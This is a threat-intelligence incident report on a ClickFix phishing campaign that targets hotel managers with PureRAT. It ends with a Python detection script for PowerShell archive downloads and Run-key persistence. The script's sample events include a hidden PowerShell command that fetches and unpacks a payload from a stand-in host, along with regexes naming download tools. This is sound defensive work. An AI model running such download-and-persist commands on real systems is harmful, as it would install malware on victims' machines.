Full Report
Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvests their credentials by deploying malware like PureRAT. "The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign
Analysis Summary
# Incident Report: Massive ClickFix Phishing Campaign Targeting Hospitality Credentials
## Executive Summary
A massive, ongoing phishing campaign has been identified targeting the hospitality industry, specifically hotel managers, by impersonating Booking.com. Attackers use compromised email accounts to send spear-phishing messages that redirect victims through a redirection chain leveraging the ClickFix social engineering tactic to deploy the PureRAT malware. The primary goal is the theft of credentials for booking platforms (like Booking.com or Expedia) for resale or use in subsequent fraud schemes.
## Incident Details
- **Discovery Date:** Campaign observed as active since at least April 2025; verified still operational as of early October 2025.
- **Incident Date:** Active since at least April 2025.
- **Affected Organization:** Multiple hotel establishments globally.
- **Sector:** Hospitality (Hotels, Booking Platform Administrators).
- **Geography:** Multiple countries (implied by global targeting of hotel chains).
## Timeline of Events
### Initial Access
- **Date/Time:** Active since at least April 2025.
- **Vector:** Spear-phishing emails sent from a compromised legitimate email account.
- **Details:** Emails impersonate Booking.com, tricking recipients into clicking malicious links that initiate a redirection chain leading to a ClickFix-style page, often presenting a fake reCAPTCHA challenge.
### Lateral Movement
- **Details:** Once PureRAT is installed, its Remote Access Trojan (RAT) feature set, including remote command execution, gives the operator the means to move laterally across the compromised network; the article does not describe lateral movement actually being carried out.
### Data Exfiltration/Impact
- **Details:** Primary impact is credential theft (login/password pairs, authentication cookies) for booking extranet accounts. Secondary impact involves fraudulent activity targeting hotel customers via WhatsApp or email, seeking banking card details under the pretext of reservation verification. PureRAT itself supports data exfiltration features.
### Detection & Response
- **How it was discovered:** Identified and documented by cybersecurity researchers (Sekoia).
- **Response actions taken:** Not explicitly detailed in the provided text, but internal investigation, malware analysis, and creation of Indicators of Compromise (IOCs) would be standard response measures.
## Attack Methodology
- **Initial Access:** Spear-phishing emails impersonating Booking.com, directing victims to malicious ClickFix pages.
- **Persistence:** Established via the deployment of PureRAT, specifically by creating a **Run registry key** on the host system.
- **Privilege Escalation:** Not explicitly detailed; the DLL side-loading infection chain implies only that code ran with privileges sufficient to write the Run registry key used for persistence.
- **Defense Evasion:** The malware (PureRAT) is protected with **.NET Reactor** to complicate reverse engineering. The infection chain involves an initial JavaScript check to see if the page is in an iframe before redirecting over HTTP.
- **Credential Access:** Theft of credentials for booking platforms (Booking.com/Expedia extranets) via downloaded binary/infostealer components associated with PureRAT execution. Fraudulent landing pages mimicking booking sites are also used separately to harvest banking card details from customers.
- **Discovery:** Indirectly implied through the RAT functionality of PureRAT, which supports remote system command execution, necessary for further reconnaissance.
- **Lateral Movement:** Supported by PureRAT's remote execution and proxying capabilities (the article does not detail how any lateral traffic moved).
- **Collection:** System information gathering (via PowerShell), keylogging, and general data theft enabled by the RAT capabilities.
- **Exfiltration:** Capability exists within PureRAT (explicitly listed feature).
- **Impact:** Compromise of management access to booking platforms, sale of credentials on cybercrime forums (e.g., LolzTeam), and direct customer fraud.
## Impact Assessment
- **Financial:** High potential for financial losses due to the sale of high-value booking extranet credentials and losses incurred from executed fraud against hotel patrons.
- **Data Breach:** Credentials (login/password pairs, authentication cookies) for Booking.com/Expedia extranet accounts. Payment card information from hotel customers targeted in secondary scams.
- **Operational:** Potential disruption to hotel management operations if systems are controlled by the RAT.
- **Reputational:** Severe reputational damage stemming from compromised customer data and fraudulent activities publicized under the guise of major booking platforms.
## Indicators of Compromise
- **Network indicators:** Defanged URLs leading to ClickFix-style pages (Specific URLs redacted in source).
- **File indicators:** ZIP archive containing the PureRAT binary; PureRAT executable (protected by .NET Reactor).
- **Behavioral indicators:** PowerShell command execution gathering system info and downloading archives; establishment of persistence via a **Run registry key**; DLL side-loading technique used for PureRAT loading.
## Response Actions
Since the operational details of internal response actions are not provided in the article, general required actions based on the observed threat profile are listed:
- **Containment:** Isolating any identified compromised hosts. Blocking network traffic associated with observed PureRAT C2 infrastructure (if IPs/domains were identified). Disabling access for any credentials known to be compromised.
- **Eradication:** Removing PureRAT persistence mechanisms (registry keys) and eliminating the malware binary across all affected endpoints.
- **Recovery:** Forcing password resets for all potentially affected administrator accounts; notifying customers potentially impacted by secondary phishing scams.
## Lessons Learned
- The use of compromised legitimate email accounts greatly increases the initial trust factor, bypassing basic perimeter defenses.
- Reliance on services like Booking.com creates a concentrated, lucrative target for attackers aiming to steal high-value platform credentials.
- Multi-stage infection chains involving JavaScript redirection, anti-iframe checks, and subsequent PowerShell execution successfully bypass straightforward antivirus/email scanning.
## Recommendations
- Implement strict **Multi-Factor Authentication (MFA)** across all sensitive management portals, especially Booking.com extranet and email infrastructure.
- Enhance email security defenses to aggressively inspect links for redirection chains characteristic of ClickFix/social engineering tactics.
- Conduct mandatory focused security awareness training for hotel staff, specifically covering phishing attempts impersonating booking platforms and requests for external "reCAPTCHA" or verification steps.
- Implement **Endpoint Detection and Response (EDR)** capable of detecting behavioral anomalies such as PowerShell downloading executables or the creation of persistence entries under the Run registry key.
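The behavioral indicators listed under Indicators of Compromise (PowerShell fetching and unpacking an archive, then persistence written under a Run registry key) and the EDR recommendation above both come down to the same detection logic. The following script is an added example, not code from Sekoia or from the article: it parses constructed Sysmon-style process-creation and registry-set records (the key=value format, hostnames, paths and command lines are all assumptions built for this example, not indicators from the report), scores each event against the two indicators, and correlates them per host so that the full download-then-persist sequence stands out from routine installer activity.

```python
"""Triage constructed endpoint telemetry for the PureRAT-style chain described
above: PowerShell archive download followed by Run-key persistence.
Added example; log format and all sample values are assumptions."""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Constructed sample records, loosely modelled on Sysmon EventID 1 (process
# creation) and EventID 13 (registry value set). Nothing here is a real IOC.
SAMPLE_EVENTS = [
    # Stage 1: hidden PowerShell fetching and unpacking an archive
    r'EventID=1 Host=HOTEL-FD01 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell -w hidden -ep bypass -c Invoke-WebRequest -Uri http://example.invalid/stage.zip '
    r'-OutFile $env:TEMP\stage.zip; Expand-Archive $env:TEMP\stage.zip $env:TEMP\stage"',
    # Stage 2: the unpacked binary registers itself under the user's Run key
    r'EventID=13 Host=HOTEL-FD01 Image=C:\Users\front\AppData\Local\Temp\stage\update.exe '
    r'TargetObject=HKU\S-1-5-21-0000\Software\Microsoft\Windows\CurrentVersion\Run\Updater '
    r'Details=C:\Users\front\AppData\Local\Temp\stage\update.exe',
    # Benign admin activity on another host: PowerShell without any download
    r'EventID=1 Host=HOTEL-FD02 Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell -c Get-ChildItem C:\Reports"',
    # Benign Run entry written by an installed product (low severity, not the chain)
    r'EventID=13 Host=HOTEL-FD03 Image="C:\Program Files\Vendor\setup.exe" '
    r'TargetObject=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent '
    r'Details="C:\Program Files\Vendor\agent.exe"',
]

# key=value pairs; a quoted value may contain spaces, a bare one may not.
KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
DOWNLOAD_RE = re.compile(r'(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b)', re.I)
ARCHIVE_RE = re.compile(r'(\.zip\b|Expand-Archive)', re.I)
# Flags that hide the window or relax execution policy raise the severity.
EVASION_RE = re.compile(r'(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass|-enc\b|-nop\b)', re.I)
RUN_KEY_RE = re.compile(r'\\CurrentVersion\\Run(Once)?\\', re.I)
USER_WRITABLE_RE = re.compile(r'\\(AppData|Temp|Downloads|Users\\Public)\\', re.I)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    severity: str
    evidence: str


def parse_event(line: str) -> dict:
    """Parse one key=value telemetry line into a dict."""
    event = {}
    for m in KV_RE.finditer(line):
        key, quoted, bare = m.group(1), m.group(2), m.group(3)
        event[key] = quoted if quoted is not None else bare
    return event


def check_powershell_download(ev: dict) -> Optional[Finding]:
    """PowerShell process whose command line both downloads and references an archive."""
    image = ev.get("Image", "").lower()
    cmd = ev.get("CommandLine", "")
    if ev.get("EventID") != "1" or not image.endswith("powershell.exe"):
        return None
    if not (DOWNLOAD_RE.search(cmd) and ARCHIVE_RE.search(cmd)):
        return None
    severity = "high" if EVASION_RE.search(cmd) else "medium"
    return Finding(ev.get("Host", "?"), "powershell_archive_download", severity, cmd)


def check_run_key_persistence(ev: dict) -> Optional[Finding]:
    """Run/RunOnce value set; high severity when it points into a user-writable path."""
    target = ev.get("TargetObject", "")
    if ev.get("EventID") != "13" or not RUN_KEY_RE.search(target):
        return None
    payload = ev.get("Details", "")
    # Installers legitimately add Run entries under Program Files; entries that
    # launch something from Temp or AppData match the staged-binary pattern.
    severity = "high" if USER_WRITABLE_RE.search(payload) else "low"
    return Finding(ev.get("Host", "?"), "run_key_persistence", severity, f"{target} -> {payload}")


def triage(lines: Iterable[str]) -> List[Finding]:
    """Run every check over every record and collect the findings in order."""
    findings = []
    for line in lines:
        ev = parse_event(line)
        for check in (check_powershell_download, check_run_key_persistence):
            found = check(ev)
            if found is not None:
                findings.append(found)
    return findings


def correlate(findings: List[Finding]) -> List[str]:
    """Hosts showing both high-severity indicators: the full download-then-persist chain."""
    by_host = {}
    for f in findings:
        if f.severity == "high":
            by_host.setdefault(f.host, set()).add(f.rule)
    chain = {"powershell_archive_download", "run_key_persistence"}
    return sorted(host for host, rules in by_host.items() if chain <= rules)


if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for f in results:
        print(f"[{f.severity}] {f.host} {f.rule}: {f.evidence}")
    print("hosts with full chain:", correlate(results))
```

On the constructed input, the two HOTEL-FD01 records each score high and correlate into one chain alert, the plain `Get-ChildItem` invocation produces nothing, and the vendor installer's Run entry is kept as a low-severity finding rather than an alert. In production the same two checks map directly onto EDR or SIEM rules over Sysmon EventID 1 and 13; the per-host correlation is what keeps the Run-key rule from paging on every software install.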